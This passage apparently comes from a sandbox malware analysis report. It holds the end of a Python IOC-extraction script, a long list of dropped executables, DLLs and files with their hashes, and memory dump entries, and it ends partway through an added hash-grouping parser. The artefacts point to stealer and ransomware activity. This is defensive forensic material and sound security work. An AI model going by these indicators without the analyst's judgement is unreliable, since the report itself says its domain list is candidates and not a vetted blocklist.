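        # Drop PTR lookups and "domains" that are just the destination IP repeated.
        if domain and not domain.endswith(".in-addr.arpa") and not _IPV4.fullmatch(domain):
            domains.add(domain)
            if proto == "tcp":
                resolved[domain].add(ip)
        if dest not in ignore_endpoints:
            endpoints.add(dest)
    return {
        "domains": sorted(domains),
        "endpoints": sorted(endpoints),
        "resolved": {d: sorted(ips) for d, ips in resolved.items()},
    }


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_NETWORK_ROWS)
    for key in ("domains", "endpoints"):
        print(key, *iocs[key], sep="\n  ")
    for domain, ips in iocs["resolved"].items():
        print(f"{domain} -> {', '.join(ips)}")
```

The output is a candidate list, not a blocklist: `api.2ip.ua` is the external-IP lookup service the signatures flag, `t.me` is a public service, and the direct-to-IP rows with no domain survive as endpoints because the table gives nothing else to key on. Which of those to block is an analyst decision; the script only removes what is certainly sandbox noise.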
Files
memory/3192-119-0x0000000002DE0000-0x0000000002DE9000-memory.dmp
memory/3180-120-0x0000000000D90000-0x0000000000DA6000-memory.dmp
memory/3192-121-0x0000000000400000-0x0000000002B94000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\256A.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\2720.exe
| MD5 | 2e9ae44f23fbf550b7e0dcfe161a1829 |
| SHA1 | b644e07519e7aac42fe4905c2bbeddc6a1c3957d |
| SHA256 | 0bafccb3ca90da20ec6582b16848f7c58f7bc2f7af3b1f15562c88942b906d0d |
| SHA512 | d5b771e262ddd4ec1266f7fcd05a16e755102bf808d22fab24ab402402980faf9ef763316f9d5921393bb5473e18e7750e28a1792dc0d5159bf015874c11f053 |
C:\Users\Admin\AppData\Local\Temp\2879.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
memory/4116-140-0x0000000000C20000-0x00000000011A5000-memory.dmp
memory/2148-144-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2148-150-0x0000000000400000-0x0000000000425000-memory.dmp
memory/3768-152-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3768-154-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3028-155-0x00000000025A0000-0x00000000026BB000-memory.dmp
memory/3768-156-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3768-157-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\cc3c16d1-0a6a-40b1-8a83-03a5c769f412\2879.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
memory/3768-178-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-184-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-185-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 89d78eb124083dfc7d87ddbf1acdff7f |
| SHA1 | 069a3b78c24057041ccbd928672113f95523a17d |
| SHA256 | ad777b3e2ac62663252cfcd7495e832f1a043bc3e0e4ecda3abf1c291eedcb0c |
| SHA512 | 34632fe51ac8fb71e52dd7490e01a3e92bbcfa545cd0309d50cb1706f336e09d754b9df04913e6a0f91cbc374cdb365da29c0b29768b56410e82d310b5ba6ebe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | df1792b408b04b987e1295b2903ed31e |
| SHA1 | 861bc2a48645e7a65acb636b15edac59f47b0748 |
| SHA256 | 0dbe2b22c5b5cb141469bcbec769b9642ecb290b47a3e348ca61a02decdff209 |
| SHA512 | 57fc1ee241a984f6165a6d35a4ed3312e2cde091750c2b293b373fb0a74ce8ea61b93a88ffa4fb3f79cc94b1a071c4e901851a2f4e3084fcce9ae08d021c031d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 0a0291b9bdf89c7e506366a8be70a80c |
| SHA1 | a30ddab885654862ba0be0159155bc99945c053f |
| SHA256 | 31631ce5dfb41c09757fbd14367f9e46dc012eed1b8d462e933a34c102441272 |
| SHA512 | b0c29fd46693496d0bd726db2a615049c8cc2996bc38132a57878706a8ee022bbb964b3f9c9bb67e520a82f2144d352655287e015f3617c85fabf72f752e30d5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 64de8c77789364879200d80868577626 |
| SHA1 | 077d4bd467ee0b454504a8977f3ecc97d79d371b |
| SHA256 | 02c03b4e0e09f1c49c810c398de6f28a18596ba5f4310cdbbd10e5a54c7c76e3 |
| SHA512 | b5869fbef5f79c784dce996b04fac4f4d49efb06e5335320aaba9fb14c81fa85dc07d0cf25e1b8fdc0433963ef73545313b9258cfb03cb77459c8abaa82fdb9c |
memory/4908-190-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-191-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4116-192-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/4908-215-0x0000000000400000-0x0000000000537000-memory.dmp
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/4908-255-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe
| MD5 | 770db2929307f3de98c1944fcd4adf92 |
| SHA1 | d84b969b5f77353f734ec251660b71f11f2a76bf |
| SHA256 | 581304c1ecc96f13dc1fcd999afed03ce2844937b63f463269352d9ba60666cb |
| SHA512 | 5bb5ac8146a540ea34aabee20b8f30a3b7fe1064f4cd18f1222aed63eb9a8a946c1e2c45a17b57e0e883ea578aacd255734aeb155451984c44ce1fb90cc66d03 |
memory/4908-261-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-259-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4256-263-0x0000000000400000-0x0000000000472000-memory.dmp
memory/4256-265-0x0000000000400000-0x0000000000472000-memory.dmp
memory/5100-266-0x0000000000960000-0x00000000009BE000-memory.dmp
memory/4256-267-0x0000000000400000-0x0000000000472000-memory.dmp
memory/4256-268-0x0000000000400000-0x0000000000472000-memory.dmp
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build3.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA1 | abe3bce01cd34afc88e2c838173f8c2bd0090ae1 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
| SHA512 | aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a |
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA1 | abe3bce01cd34afc88e2c838173f8c2bd0090ae1 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
| SHA512 | aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a |
memory/4908-275-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-278-0x0000000000400000-0x0000000000537000-memory.dmp
C:\ProgramData\24035804214954848532.exe
| MD5 | e90303c5b9fcdfb0d98bc0fcd481d9d7 |
| SHA1 | 1fcfd04f2f5f34cb291a2d916e6af899160258f9 |
| SHA256 | 95fd57f641b8e2c38909090e20d6216242aa7bdab79b2e8537153acd5401a211 |
| SHA512 | 11323d67db1936defe48cc3efc8832a960af292ca3720ec3447e1c010d9409eb82a8791884277c5228775701e09b07cb7761ca517f622d41b69baeeae3ac5589 |
memory/1120-290-0x0000000000100000-0x0000000000118000-memory.dmp
memory/1120-291-0x0000000005070000-0x000000000556E000-memory.dmp
memory/1120-292-0x0000000004A90000-0x0000000004B22000-memory.dmp
memory/1120-293-0x0000000004A80000-0x0000000004A8A000-memory.dmp
memory/1120-295-0x0000000004D40000-0x0000000004D50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\0Y1BN2H9.cookie
| MD5 | 82cc7dc1e0a3a2ed0ec31460f0a5aa28 |
| SHA1 | 3e337c1d69d6b9fb7f37502c150d733ae281007f |
| SHA256 | 34d87a0b3ea4c858bd74128e2509cc2b9e218773597915c13172b0b0619414f1 |
| SHA512 | b5e1e18c639ce5b096be12177001747cb2e2893130863ffb05f0a90826e01d0237082cc37570cb730c932bb34ef8af54ffb8bb0c62b0334790a75a8e18ae5c3f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\70C71DBB8B7D2BBCA12DF82826D851E0_278EAB15C57802B8465F5CA2986E9B30
| MD5 | 9123a67a5983a9cbdb0aebcae3b599bb |
| SHA1 | 835de7a6e740769ff9eff37e349a4da911c3124c |
| SHA256 | f2e5c6c323362aa8643ea0b674b26ffbd8dc10a28cd9405c8d91e249534d789e |
| SHA512 | 517858fc0fc571bd3996f6ce918bcfec5d867b510746a5ebb03e841b79f5d0817d2121ac135c80d38574a0c71f1315358edfd66e116e0d500e449d7ba7c0e7af |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\70C71DBB8B7D2BBCA12DF82826D851E0_278EAB15C57802B8465F5CA2986E9B30
| MD5 | 7ea423f7eb6bba31f39f3f1ae2cefd1a |
| SHA1 | 7e92aa8510b701fc11125923e4dba69744e16044 |
| SHA256 | 7d598b0d74e8ac9932e6cf879ef377a253b6079906ec5357cc4576f91b20158e |
| SHA512 | 8703dec7e53a76a7eb76c89670f20f602929df3749e317425416cb80bbd1348beaecbf6492d03460d1f8b9ce5bfa209e8934e265413944ab14c2002b8326d419 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
| MD5 | d8851ee7ccf673de7f63c7da10e5084f |
| SHA1 | c53c5fef62a38c252b93ca82c4dcc0ea0fa0228a |
| SHA256 | 97b2dd41230ac712ce70493486a4fc3456b448485d7d568205362bb9959891e9 |
| SHA512 | fcbd0f493ee525440745fce7a71a00f10ecc9d8216a8c87c51db455244afc25200d45fc11932cea21f7f21ef507f644234de118b4c0039323e5b3eb2b855f6fd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
| MD5 | 404812f55e637f845e0b5193043127e6 |
| SHA1 | fa866556e9b1ae14ab8d8cd358ac697e436a085f |
| SHA256 | 7825fda447a6c9c3b261761690592b823c4acfffd97f21b4ad70121d3818fec1 |
| SHA512 | 8ed8d149a3ca7a82432844732ee2081075f587042594cfc71e25f6f84bd0abb1ce0c47eaf67fd50fff5d1aa51286b28f8c45661a3c5ca21c66084d32247073aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
| MD5 | 0072f070f8240569108fb61ebc67a593 |
| SHA1 | ca4e5363abc7bab43d923a851eb7c7beb8c851cd |
| SHA256 | 0fc341bc9920a496b3cbc85687e26c64977d121d239d3bb6f71bcf0461d3f5b6 |
| SHA512 | dda7380bb83e9ba5c08f0582e972ef1873d6b0bd4b5ef911eec59b0d738b6f445a762ec70c0a826fa7850cb9b0ed4e4f1639e97e7034253309c93c17e6368ceb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
| MD5 | 9e756365912f553e4dd47d19be07ff76 |
| SHA1 | 0d7fbbe6123d314b9e27105d97a8a47031ee377a |
| SHA256 | 3fe1d3a26bc27e6072365e61982fd366f97dc20ac782181a0182f8df8c2ad08c |
| SHA512 | ebd583fc98fbafced97390ec43a24601a625a84502d52d1a1612b2bca2c88bae2f16ad221bf69d9080372c3bad6695ad9ea912c469f54fed9136fa894f0f2092 |
memory/4256-303-0x0000000000400000-0x0000000000472000-memory.dmp
memory/4256-304-0x0000000000400000-0x0000000000472000-memory.dmp
memory/3180-308-0x0000000000D70000-0x0000000000D80000-memory.dmp
memory/3180-311-0x0000000001140000-0x0000000001150000-memory.dmp
memory/3180-315-0x0000000001140000-0x0000000001150000-memory.dmp
C:\ProgramData\softokn3.dll
| MD5 | 4e52d739c324db8225bd9ab2695f262f |
| SHA1 | 71c3da43dc5a0d2a1941e874a6d015a071783889 |
| SHA256 | 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a |
| SHA512 | 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6 |
C:\ProgramData\vcruntime140.dll
| MD5 | a37ee36b536409056a86f50e67777dd7 |
| SHA1 | 1cafa159292aa736fc595fc04e16325b27cd6750 |
| SHA256 | 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825 |
| SHA512 | 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\freebl3.dll
| MD5 | 550686c0ee48c386dfcb40199bd076ac |
| SHA1 | ee5134da4d3efcb466081fb6197be5e12a5b22ab |
| SHA256 | edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa |
| SHA512 | 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\msvcp140.dll
| MD5 | 5ff1fca37c466d6723ec67be93b51442 |
| SHA1 | 34cc4e158092083b13d67d6d2bc9e57b798a303b |
| SHA256 | 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062 |
| SHA512 | 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546 |
C:\ProgramData\39094993839737530988817096
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
memory/3180-368-0x0000000001330000-0x0000000001340000-memory.dmp
memory/3180-370-0x0000000001330000-0x0000000001340000-memory.dmp
memory/3180-381-0x0000000001330000-0x000000000133D000-memory.dmp
memory/1120-383-0x0000000004D40000-0x0000000004D50000-memory.dmp
memory/3180-385-0x0000000001330000-0x0000000001340000-memory.dmp
memory/3180-386-0x0000000001330000-0x0000000001340000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BFF7.exe
| MD5 | 10ec0c51d73f68a10b00a9425b0c2a4c |
| SHA1 | 3796a9eb91ee0b86ea953370de6b97a036b3b6e9 |
| SHA256 | 6c2c90bb276297dac4caf0b20e38b3a828bac9c98533c36423090cd4fe9a8952 |
| SHA512 | 43976bc013d6414147c2670f36ed6b0b9f7e59a1369264b7bdcb522e71fbd8555677db2b4faba59e1d6e1039c89c757e875ae7af8173518ac9e39bc8d984aad4 |
C:\Users\Admin\AppData\Local\Temp\C1DD.exe
| MD5 | d8a10ec2997baf08895cbf482e904c8c |
| SHA1 | 7c58df320d1bc7d4249b6e66016f09ae4139a079 |
| SHA256 | 43cc1575c2949413764525d6298185eb8a39b9216247e7b75724ec2daadf461e |
| SHA512 | 5bde578d0634be516539fe764e2804013e8996fd357c024b5da713d15432c70a763e20909d890614bed592c3815748a450d6be136de05ae92f61ae5f22a61703 |
memory/1088-395-0x0000000000160000-0x0000000000640000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C48D.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
C:\Users\Admin\AppData\Local\Temp\ss31.exe
| MD5 | 680261f70d257ae53f013d24256413be |
| SHA1 | 594de5bf6e3d623a51c2cb3d6dcf965d332db489 |
| SHA256 | 5d79cc7f4a364f98939de1e6aebf20c450ed138f8250ce6170b6acbbf102f322 |
| SHA512 | 02cbabcc76b3e24b7bc97fd151a055e9fde44d44bd64eb56c95f44ea4ed26a3caa97c07d20c14ab8eb84009b9a3e615eb3f9fcb9e020edd888f21141d2ac4d52 |
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
memory/4064-419-0x0000000002320000-0x0000000002356000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
memory/3392-434-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\bowsakkdestx.txt
| MD5 | 2277ba657f74ebf5f54f4ca673c7175a |
| SHA1 | f63ee87552b61daf105a5761dbd46eb822bfbe70 |
| SHA256 | 3933af72068c942e0f52a4e8f3a1838708d3ce0d4034965f147f42a8a2f9c693 |
| SHA512 | 5fde135a269f210439693b5422f237a05d84292f1150779e65fb86dd3af4e5f1236dba52a1e7070a86831633a5dc6308233e13d9f3f1bd211353eb27f0e38dbf |
C:\SystemID\PersonalID.txt
| MD5 | 1b3507fc53f5dcf8b10f4064c775983a |
| SHA1 | a945f49499b28c0cc930e46b60c10226e6a79a8a |
| SHA256 | 6a140e9e02edc63ba5ff3ecf57892f90c8e2fe1285a257b84a42285d0d51023b |
| SHA512 | a017dd4183a493c132c6aa920221bf3de915e8b2ca1677123850f1eb9bca169c9de9dabbd83f29e0b7df44bf4d939f688af57ed34db8fd0c5e55683ba07304fe |
memory/5080-450-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3948-451-0x0000000002DD0000-0x0000000002F3E000-memory.dmp
memory/3948-452-0x0000000002F40000-0x000000000306F000-memory.dmp
C:\ProgramData\63211249309403280024451816
| MD5 | b133605a69c0c42d03bb7e5020b86258 |
| SHA1 | ad8bb42ba6411cf8df977b47f2dbed7d4a214a0f |
| SHA256 | f0c9146c1d86eac1962b0722ccf051e8783c1e8977380cba1ce366a41861d20a |
| SHA512 | 2f32b79eccb10f524e82eab7301630a504046075a066b0383cb546b7569d2b558a4db45a9ca6743f969e9bf970896e7e0df6cc9f214542527c8bb9e0f323e15c |
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe
| MD5 | 770db2929307f3de98c1944fcd4adf92 |
| SHA1 | d84b969b5f77353f734ec251660b71f11f2a76bf |
| SHA256 | 581304c1ecc96f13dc1fcd999afed03ce2844937b63f463269352d9ba60666cb |
| SHA512 | 5bb5ac8146a540ea34aabee20b8f30a3b7fe1064f4cd18f1222aed63eb9a8a946c1e2c45a17b57e0e883ea578aacd255734aeb155451984c44ce1fb90cc66d03 |
memory/1128-472-0x0000000000400000-0x0000000000472000-memory.dmp
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build3.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA1 | abe3bce01cd34afc88e2c838173f8c2bd0090ae1 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
| SHA512 | aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a |
memory/5080-487-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3948-488-0x0000000002F40000-0x000000000306F000-memory.dmp
memory/1128-492-0x0000000000400000-0x0000000000472000-memory.dmp
memory/4256-508-0x0000000000400000-0x0000000000472000-memory.dmp
C:\ProgramData\07310722422854684069160988
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
memory/2968-550-0x0000027169140000-0x0000027169162000-memory.dmp
memory/2968-553-0x00000271697C0000-0x0000027169836000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05s2xbzh.aj5.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2968-566-0x0000027169860000-0x0000027169870000-memory.dmp
memory/2968-567-0x0000027169860000-0x0000027169870000-memory.dmp
memory/2968-589-0x0000027169860000-0x0000027169870000-memory.dmp
memory/4420-618-0x000001B3AE060000-0x000001B3AE070000-memory.dmp
memory/4420-619-0x000001B3AE060000-0x000001B3AE070000-memory.dmp
memory/4420-620-0x000001B3AE060000-0x000001B3AE070000-memory.dmp
memory/3504-646-0x0000012C2BFA0000-0x0000012C2BFB0000-memory.dmp
memory/3504-647-0x0000012C2BFA0000-0x0000012C2BFB0000-memory.dmp
C:\ProgramData\55444878738241288210718769
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\Users\Admin\AppData\Local\Temp\CC99.exe
| MD5 | 10ec0c51d73f68a10b00a9425b0c2a4c |
| SHA1 | 3796a9eb91ee0b86ea953370de6b97a036b3b6e9 |
| SHA256 | 6c2c90bb276297dac4caf0b20e38b3a828bac9c98533c36423090cd4fe9a8952 |
| SHA512 | 43976bc013d6414147c2670f36ed6b0b9f7e59a1369264b7bdcb522e71fbd8555677db2b4faba59e1d6e1039c89c757e875ae7af8173518ac9e39bc8d984aad4 |
memory/4452-689-0x0000000002BF0000-0x0000000002BF9000-memory.dmp
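The listing above is a flat sequence of dropped-file paths, headerless hash rows and memory-dump names, and the same payload recurs under several names (2879.exe and C48D.exe carry one SHA256, as do build3.exe and mstsca.exe, oldplayer.exe and oneetx.exe, BFF7.exe and CC99.exe). The following is an added example, not part of the report or of any sandbox tooling: a Python parser for exactly this listing format that groups dropped files by SHA256 so aliases collapse into one indicator, sums the distinct memory ranges dumped per PID, and checks a recorded hash set against a candidate file body. The sample input is an abridged excerpt of the lines above; the function names are the example's own.

```python
"""Parse the dropped-file / memory-dump listing of a sandbox report.

Added example (not the report's own tooling). It groups files by SHA256,
sizes the dumped regions per PID, and verifies recorded hashes against a
candidate file body.
"""
import hashlib
import re
from collections import defaultdict

# Constructed sample: lines copied verbatim from the listing above (abridged).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\2879.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
memory/4908-184-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-185-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4116-192-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C48D.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05s2xbzh.aj5.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
"""

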